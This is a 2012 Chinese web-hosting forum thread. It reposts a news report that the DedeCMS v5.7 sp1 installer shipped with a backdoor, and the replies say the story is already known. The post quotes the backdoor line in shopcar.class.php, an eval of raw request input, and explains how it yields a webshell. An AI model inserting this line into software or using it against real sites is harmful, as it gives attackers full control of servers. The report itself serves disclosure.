全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2472|回复: 8
打印 上一主题 下一主题

[Windows VPS] 织梦CMS系统被指植入后门

[复制链接]
跳转到指定楼层
1#
发表于 2012-3-22 19:58:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
  据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
  安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。

  -----------来源网易  
            ******************************************************************
              真  滴   假    滴 ??
            ******************************************************************
2#
发表于 2012-3-22 19:59:34 | 只看该作者
真的
3#
发表于 2012-3-22 19:59:39 | 只看该作者
论坛前几天就有人发了啊
4#
发表于 2012-3-22 20:00:48 | 只看该作者
真的
5#
发表于 2012-3-22 20:01:27 | 只看该作者
wooyun上看到过
6#
 楼主| 发表于 2012-3-22 20:01:59 | 只看该作者
我 去    ,  几天没上网居然 OUT成这样了
7#
发表于 2012-3-22 20:02:02 | 只看该作者
此事已经不是新闻了
8#
发表于 2012-3-22 20:08:34 | 只看该作者
必须的,
9#
发表于 2012-3-22 20:14:39 | 只看该作者
日,织梦这回估计萎了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-4-12 18:15 , Processed in 0.093530 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表